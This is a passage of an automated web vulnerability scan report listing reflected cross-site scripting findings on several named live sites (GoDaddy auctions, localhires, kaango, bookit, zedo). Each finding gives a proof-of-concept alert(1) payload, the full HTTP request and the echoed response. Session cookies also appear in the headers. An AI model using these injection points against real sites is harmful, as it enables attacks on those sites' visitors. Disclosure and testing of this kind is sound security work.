               shsClose(1); shsClose(2); shsClose(3); shsClose(4); shsClose(5);
               shsClose(6); shsClose(7); shsClose(8
...[SNIP]...

3.20. https://auctions.godaddy.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://auctions.godaddy.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript rest-of-line comment. The payload f5f88%0aalert(1)//18c6c8e3c8d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f5f88
alert(1)//18c6c8e3c8d
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?f5f88%0aalert(1)//18c6c8e3c8d=1 HTTP/1.1
Host: auctions.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 23:08:39 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=c1yviejda3oh2snze4wofx55; path=/; HttpOnly
Set-Cookie: traffic=cookies=1&referrer=&sitename=auctions.godaddy.com&page=/trpHome.aspx&server=DNAWEB03&status=200 OK&querystring=f5f88%0aalert(1)%2f%2f18c6c8e3c8d=1&shopper=&privatelabelid=1&isc=&clientip=174.122.23.218&referringpath=; domain=godaddy.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 209402


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head id="ctl00_Head1"><tit
...[SNIP]...
e").value = getObj("loginname-loginname").value;
               getObj("auctionPassword").value = getObj("password-password").value;
               setCookie("IDPLoginRedirect", "https://auctions.godaddy.com/trpHome.aspx?f5f88
alert(1)//18c6c8e3c8d
=1");
               document.auctionLoginForm.submit();
           }

           function closePods(header)
           {
               shsClose(1); shsClose(2); shsClose(3); shsClose(4); shsClose(5);
               shsClose(6); shsClose(7); shsClose
...[SNIP]...

3.21. https://auctions.godaddy.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://auctions.godaddy.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9be2e"%3balert(1)//2e07d29c569 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9be2e";alert(1)//2e07d29c569 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?9be2e"%3balert(1)//2e07d29c569=1 HTTP/1.1
Host: auctions.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 14 Nov 2010 23:08:37 GMT
Server: Microsoft-IIS/6.0
P3P: CP="IDC DSP COR LAW CUR ADM DEV TAI PSA PSD IVA IVD HIS OUR SAM PUB LEG UNI COM NAV STA"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=es4x3t3m5fzfzauv4wge2t55; path=/; HttpOnly
Set-Cookie: traffic=cookies=1&referrer=&sitename=auctions.godaddy.com&page=/trpHome.aspx&server=DNAWEB03&status=200 OK&querystring=9be2e%22%3balert(1)%2f%2f2e07d29c569=1&shopper=&privatelabelid=1&isc=&clientip=174.122.23.218&referringpath=; domain=godaddy.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 210223


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head id="ctl00_Head1"><tit
...[SNIP]...
<script type="text/javascript">
               function AddMembershipToCart() {
                   setCookie("IDPLoginRedirect", "https://auctions.godaddy.com/trpHome.aspx?9be2e";alert(1)//2e07d29c569=1");
                   if (getObj("ctl00_cphMaster_tbBidAmount"))
                   { setCookie("IDPBid", getObj("ctl00_cphMaster_tbBidAmount").value); }
                   else if (getObj("ctl00_cphMaster_tbOfferAmount"))
                   { setCoo
...[SNIP]...

3.22. http://bayarea.localhires.com/job_fairs/view/1039 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bayarea.localhires.com
Path:   /job_fairs/view/1039

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c45e"><script>alert(1)</script>093fc53e67a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /job_fairs/view/1039?9c45e"><script>alert(1)</script>093fc53e67a=1 HTTP/1.1
Host: bayarea.localhires.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 01:59:26 GMT
Server: Apache
Served-By: Joyent
Set-Cookie: Localhires=895qnvadt9mj5agn5njgpf9hjq5al4ks; expires=Thu, 15-Nov-2035 07:59:26 GMT; path=/; domain=.localhires.com
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: last_fair_id=1039
Set-Cookie: Localhires=895qnvadt9mj5agn5njgpf9hjq5al4ks; expires=Thu, 15-Nov-2035 07:59:26 GMT; path=/; domain=.localhires.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
   <meta http-equiv="Conten
...[SNIP]...
<a class="addthis_button" href="http://www.addthis.com/bookmark.php?v=152&amp;pub=xa-4ab7c54d65a99a54" onMouseOver="return addthis_open(this, '', 'http://bayarea.localhires.com/job_fairs/view/1039?9c45e"><script>alert(1)</script>093fc53e67a=1', 'San Jose Job Fair on November 16th, 2010 on Tuesday, November 16, 2010')" onMouseOut="addthis_close()" onClick="return addthis_sendto()" rel="nofollow">
...[SNIP]...

3.23. http://bayareamarketplace.kaango.com/ads/search [search parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bayareamarketplace.kaango.com
Path:   /ads/search

Issue detail

The value of the search request parameter is copied into the HTML document as plain text between tags. The payload 4d577<script>alert(1)</script>4e5c6690b88 was submitted in the search parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ads/search?search=4d577<script>alert(1)</script>4e5c6690b88&cat=561&fq=categoryid:903&listtype=1 HTTP/1.1
Host: bayareamarketplace.kaango.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=0bdbf11e73ab5ff78a1f8da6916f0855;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Date: Mon, 15 Nov 2010 01:59:43 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache
X-Powered-By: PHP/5.3.3
Connection: Close
Content-Length: 43965


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

...[SNIP]...
<p>
Bay Area Marketplace:

0 search results for '4d577<script>alert(1)</script>4e5c6690b88'
within 100 miles from San Jose, California

in category Autos: Services & Parts
           &nbsp;</p>
...[SNIP]...

3.24. http://bayareamarketplace.kaango.com/feListAds [search parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bayareamarketplace.kaango.com
Path:   /feListAds

Issue detail

The value of the search request parameter is copied into the HTML document as plain text between tags. The payload 50f7d<script>alert(1)</script>abb9201ca97 was submitted in the search parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /feListAds?search=50f7d<script>alert(1)</script>abb9201ca97&cat=561&listtype=1 HTTP/1.1
Host: bayareamarketplace.kaango.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=0bdbf11e73ab5ff78a1f8da6916f0855;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Date: Mon, 15 Nov 2010 01:59:45 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache
X-Powered-By: PHP/5.3.3
Connection: Close
Content-Length: 43491


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

...[SNIP]...
<p>
Bay Area Marketplace:

0 search results for '50f7d<script>alert(1)</script>abb9201ca97'
within 100 miles from San Jose, California

in category Autos: Services & Parts
           &nbsp;</p>
...[SNIP]...

3.25. http://bookit.com/us/california/san-francisco/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bookit.com
Path:   /us/california/san-francisco/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25fdd</script><script>alert(1)</script>6017cefd337 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /us/california/san-francisco/?25fdd</script><script>alert(1)</script>6017cefd337=1 HTTP/1.1
Host: bookit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 14 Nov 2010 23:09:01 GMT
Server: Apache
Set-Cookie: siteId=198; expires=Tue, 14-Dec-2010 23:09:01 GMT; path=/; domain=.bookit.com
Expires: Sun, 14 Nov 2010 23:19:01 GMT
Cache-Control: max-age=600, must-revalidate
Connection: close
Content-Type: text/html
Content-Length: 762675

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
   <html>
       <head>
       <title>San Francisco Hotels: Book Your San Francisco California Hotel Online BookIt.co
...[SNIP]...
<br>25fdd</script><script>alert(1)</script>6017cefd337=>
...[SNIP]...

3.26. http://c7.zedo.com/ibar/v12-002/c1/jsc/fcn1.js [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /ibar/v12-002/c1/jsc/fcn1.js

Issue detail

The value of the c request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload def38%3balert(1)//121dfcfc6b0 was submitted in the c parameter. This input was echoed as def38;alert(1)//121dfcfc6b0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ibar/v12-002/c1/jsc/fcn1.js?01AD=3_f9_F-HE3TFbH5_8g3zKVym2R2LtJpQdJ4-cbx_3y2eOLFaNCGa2jQ&01RI=2C2A2265FA21E98&01NA=&n=162&c=570def38%3balert(1)//121dfcfc6b0&s=372&d=21&w=1&x=29&h=1&t=http://c7.zedo.com/OzoDB/headers/162/intercept_int268_common.js&r=24&z=0.9249365942940089 HTTP/1.1
Accept: */*
Referer: http://www.mercurynews.com/bay-area-living
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Cookie: FFgeo=8925100; PI=h885454Za799502Zc305003873%2C305003873Zs696Zt0317; ZEDOIDX=29; FFCap=1406B233,180220,180225:951,125045:933,151717,151720:305,147127|0,1,1:2,1,1:0,2,1:0,2,1:0,2,1:0,7,1; ZFFbh=826-20101107,20|305_1; PC1040370=a851890Zc233002640%2C233002640Zs0Zi1Zt0311; PCA1017184=a847107Zc1390000002%2C1390000002Zs1Zi0Zt0311; FFChanCap=1407B951,7#702999#606844#851294#606842,11#538792,10#776117,2#776116:1025,2#835847:1083,20#647876#647857,19#743780|0,1,1:0,1,1:0,1,1:2,1,1:3,1,1:0,1,1:0,1,1:0,1,1:2,6,1:1,6,1:0,6,1; ZEDOIDA=7hzYTHqu2he0b1gNQivQG6Q8~110810; ZFFAbh=677B826,20|305_1#365; FFAbh=684B1329,20|1_1#365; IZ93=CT-1
Proxy-Connection: Keep-Alive
Host: c7.zedo.com

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: IZ93=3_f9_F-HE3TFbH5_8g3zKVym2R2LtJpQdJ4-cbx_3y2eOLFaNCGa2jQ; expires=Mon, 13-Dec-2010 01:07:17 GMT; path=/; domain=c7.zedo.com
Set-Cookie: ZHO162,570def38;alert(1),21=1;expires=Tue, 16 Nov 2010 01:00:00 GMT;domain=.zedo.com;path=/;
ETag: "a1a6d5-f92-48e2846698880"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Vary: Accept-Encoding
X-Varnish: 408653166
Cache-Control: max-age=842
Date: Mon, 15 Nov 2010 01:07:17 GMT
Connection: close
Content-Length: 5041

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var zzStr="q=0;z="+Math.random();var zzSection=372;var zzPat='0';var zzIdx='29';

var zzNetwork=162;var zzChannel=570def38;alert(1)//121dfcfc6b0;var zzSection=372;var zzDim=21;


if(document.all){
if(document.documentElement&&document.documentElement.clientWidth&&document.documentElement.offsetWidth){
var yr2=document.documentElement.offsetHei
...[SNIP]...

3.27. http://c7.zedo.com/jsc/c5/fl.js [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /jsc/c5/fl.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf915"-alert(1)-"09447ce8dc5 was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsc/c5/fl.js?n=1239&c=98&s=27&d=14&w=728&h=90&l=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/65636/0/cj/V126FECEDEFJ-573I700K63342AE7A17DAAE7A17DAK63702K63698QK63359QQL1151690G00G0Q32/bf915"-alert(1)-"09447ce8dc5&z=115169\ HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=7hzYTHqu2he0b1gNQivQG6Q8~110810; FFgeo=8925100; ZFFbh=826-20101107,20|305_1; PC1040370=a851890Zc233002640%2C233002640Zs0Zi1Zt0311; ZHO162,570,21=1; ZFFAbh=677B826,20|305_1#365; FFAbh=684B1329,20|1_1#365; ZCBC=1; ZEDOIDX=29; PI=h885454Za799502Zc305003873%2C305003873Zs696Zt0317; FFChanCap=1407B951,7#702999#606844#851294#606842,11#538792,10#776117,2#776116:1025,2#835847:1083,20#647876#647857,19#743780|0,1,1:0,1,1:0,1,1:2,1,1:3,1,1:0,1,1:0,1,1:0,1,1:2,6,1:1,6,1:0,6,1; IZ93=3_f9_F-HE3TFbH5_8g3zKVym2R2LtJpQdJ4-cbx_3y2eOLFaNCGa2jQ; PCA1017184=a847107Zc1390000002%2C1390000002Zs1Zi0Zt0311; FFCap=1406B233,180220,180225:951,125045:933,151717,151720:305,147127|0,1,1:2,1,1:0,2,1:0,2,1:0,2,1:0,7,1;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1933
Content-Type: application/x-javascript
ETag: "703b68d0-4429-48e2858f30440"
X-Varnish: 408724450 408724126
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=113
Expires: Mon, 15 Nov 2010 02:53:10 GMT
Date: Mon, 15 Nov 2010 02:51:17 GMT
Connection: close

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=27;var zzPat='';

var zzhasAd;


               var zzStr =
...[SNIP]...
IdxCh + zzIdxPub + zzIdxPos + zzIdxClk + ainfo + ";k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/65636/0/cj/V126FECEDEFJ-573I700K63342AE7A17DAAE7A17DAK63702K63698QK63359QQL1151690G00G0Q32/bf915"-alert(1)-"09447ce8dc5http://consumertipsonline.net/health/us4.php?t=1239000098\" TARGET=\"_blank\" onMouseOver='window.status=\" Ad powered by ZEDO\"; return true;' onMouseOut='window.status=\"\"; return true;'>
...[SNIP]...

3.28. http://c7.zedo.com/jsc/c5/fl.js [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /jsc/c5/fl.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31bdf"-alert(1)-"a648b904fc1 was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsc/c5/fl.js?n=1239&c=98&s=27&d=14&w=728&h=90&l=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/65636/0/cj/V126FECEDEFJ-573I700K63342AE7A17DAAE7A17DAK63702K63698QK63359QQL1151690G00G0Q32/31bdf"-alert(1)-"a648b904fc1&z=115169 HTTP/1.1
Accept: */*
Referer: http://newspaperads.mercurynews.com/ROP/ads.aspx?advid=36689
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: c7.zedo.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: FFgeo=8925100; PI=h885454Za799502Zc305003873%2C305003873Zs696Zt0317; ZEDOIDX=29; FFCap=1406B233,180220,180225:951,125045:933,151717,151720:305,147127|0,1,1:2,1,1:0,2,1:0,2,1:0,2,1:0,7,1; ZFFbh=826-20101107,20|305_1; PC1040370=a851890Zc233002640%2C233002640Zs0Zi1Zt0311; PCA1017184=a847107Zc1390000002%2C1390000002Zs1Zi0Zt0311; FFChanCap=1407B951,7#702999#606844#851294#606842,11#538792,10#776117,2#776116:1025,2#835847:1083,20#647876#647857,19#743780|0,1,1:0,1,1:0,1,1:2,1,1:3,1,1:0,1,1:0,1,1:0,1,1:2,6,1:1,6,1:0,6,1; ZEDOIDA=7hzYTHqu2he0b1gNQivQG6Q8~110810; ZFFAbh=677B826,20|305_1#365; FFAbh=684B1329,20|1_1#365; ZHO162,570,21=1; IZ93=3_f9_F-HE3TFbH5_8g3zKVym2R2LtJpQdJ4-cbx_3y2eOLFaNCGa2jQ

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
ETag: "898b0b78-4239-48e2858f30440"
Vary: Accept-Encoding
X-Varnish: 1843423143 1843421748
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=109
Date: Mon, 15 Nov 2010 02:51:21 GMT
Connection: close
Content-Length: 1933

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=27;var zzPat='';

var zzhasAd;


               var zzStr =
...[SNIP]...
IdxCh + zzIdxPub + zzIdxPos + zzIdxClk + ainfo + ";k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/65636/0/cj/V126FECEDEFJ-573I700K63342AE7A17DAAE7A17DAK63702K63698QK63359QQL1151690G00G0Q32/31bdf"-alert(1)-"a648b904fc1http://consumertipsonline.net/health/us4.php?t=1239000098\" TARGET=\"_blank\" onMouseOver='window.status=\" Ad powered by ZEDO\"; return true;' onMouseOut='window.status=\"\"; return true;'>
...[SNIP]...

3.29. http://c7.zedo.com/jsc/c5/fl.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /jsc/c5/fl.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4eeda'-alert(1)-'52d71231c98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsc/c5/fl.js?4eeda'-alert(1)-'52d71231c98=1 HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=7hzYTHqu2he0b1gNQivQG6Q8~110810; FFgeo=8925100; ZFFbh=826-20101107,20|305_1; PC1040370=a851890Zc233002640%2C233002640Zs0Zi1Zt0311; ZHO162,570,21=1; ZFFAbh=677B826,20|305_1#365; FFAbh=684B1329,20|1_1#365; ZCBC=1; ZEDOIDX=29; PI=h885454Za799502Zc305003873%2C305003873Zs696Zt0317; FFChanCap=1407B951,7#702999#606844#851294#606842,11#538792,10#776117,2#776116:1025,2#835847:1083,20#647876#647857,19#743780|0,1,1:0,1,1:0,1,1:2,1,1:3,1,1:0,1,1:0,1,1:0,1,1:2,6,1:1,6,1:0,6,1; IZ93=3_f9_F-HE3TFbH5_8g3zKVym2R2LtJpQdJ4-cbx_3y2eOLFaNCGa2jQ; PCA1017184=a847107Zc1390000002%2C1390000002Zs1Zi0Zt0311; FFCap=1406B233,180220,180225:951,125045:933,151717,151720:305,147127|0,1,1:2,1,1:0,2,1:0,2,1:0,2,1:0,7,1;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 771
Content-Type: application/x-javascript
ETag: "703b68d0-4429-48e2858f30440"
X-Varnish: 408724450 408724126
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=1733
Expires: Mon, 15 Nov 2010 03:20:03 GMT
Date: Mon, 15 Nov 2010 02:51:10 GMT
Connection: close

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var w0=new Image();

w0.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=lar/v10-003/c7;referrer='+document.referrer+';tag=c7.zedo.com/jsc/c5/fl.js;qs=4eeda'-alert(1)-'52d71231c98=1;';

var zzStr="q=;z="+Math.random();var zzSection=0;var zzPat='';

var zzhasAd;
var zzpixie = new Image();
var zzRandom = Math.random();
var zzDate = new Date();
var zzd = new Date(); zzd.setDate(zz
...[SNIP]...

3.30. http://c7.zedo.com/lar/v10-003/c7/jsc/flr.js [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /lar/v10-003/c7/jsc/flr.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39d3e"-alert(1)-"04bae8b6b31 was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lar/v10-003/c7/jsc/flr.js?n=1239&c=98&s=27&d=14&w=728&h=90&l=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/65636/0/cj/V126FECEDEFJ-573I700K63342AE7A17DAAE7A17DAK63702K63698QK63359QQL1151690G00G0Q32/39d3e"-alert(1)-"04bae8b6b31&z=115169 HTTP/1.1
Accept: */*
Referer: http://newspaperads.mercurynews.com/ROP/ads.aspx?advid=36689
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: c7.zedo.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: FFgeo=8925100; PI=h885454Za799502Zc305003873%2C305003873Zs696Zt0317; ZEDOIDX=29; FFCap=1406B233,180220,180225:951,125045:933,151717,151720:305,147127|0,1,1:2,1,1:0,2,1:0,2,1:0,2,1:0,7,1; ZFFbh=826-20101107,20|305_1; PC1040370=a851890Zc233002640%2C233002640Zs0Zi1Zt0311; PCA1017184=a847107Zc1390000002%2C1390000002Zs1Zi0Zt0311; FFChanCap=1407B951,7#702999#606844#851294#606842,11#538792,10#776117,2#776116:1025,2#835847:1083,20#647876#647857,19#743780|0,1,1:0,1,1:0,1,1:2,1,1:3,1,1:0,1,1:0,1,1:0,1,1:2,6,1:1,6,1:0,6,1; ZEDOIDA=7hzYTHqu2he0b1gNQivQG6Q8~110810; ZFFAbh=677B826,20|305_1#365; FFAbh=684B1329,20|1_1#365; ZHO162,570,21=1; ZCBC=1; IZ93=3_f9_F-HE3TFbH5_8g3zKVym2R2LtJpQdJ4-cbx_3y2eOLFaNCGa2jQ

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
ETag: "898b0b78-4239-48e2858f30440"
Vary: Accept-Encoding
X-Varnish: 1843423143 1843421748
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=109
Date: Mon, 15 Nov 2010 02:51:21 GMT
Connection: close
Content-Length: 1933

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=27;var zzPat='';

var zzhasAd;


               var zzStr =
...[SNIP]...
IdxCh + zzIdxPub + zzIdxPos + zzIdxClk + ainfo + ";k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/65636/0/cj/V126FECEDEFJ-573I700K63342AE7A17DAAE7A17DAK63702K63698QK63359QQL1151690G00G0Q32/39d3e"-alert(1)-"04bae8b6b31http://consumertipsonline.net/health/us4.php?t=1239000098\" TARGET=\"_blank\" onMouseOver='window.status=\" Ad powered by ZEDO\"; return true;' onMouseOut='window.status=\"\"; return true;'>
...[SNIP]...

3.31. http://c7.zedo.com/lar/v10-003/c7/jsc/flr.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /lar/v10-003/c7/jsc/flr.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f763'-alert(1)-'1a7b6ec85c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /lar/v10-003/c7/jsc/flr.js?1f763'-alert(1)-'1a7b6ec85c8=1 HTTP/1.1
Host: c7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
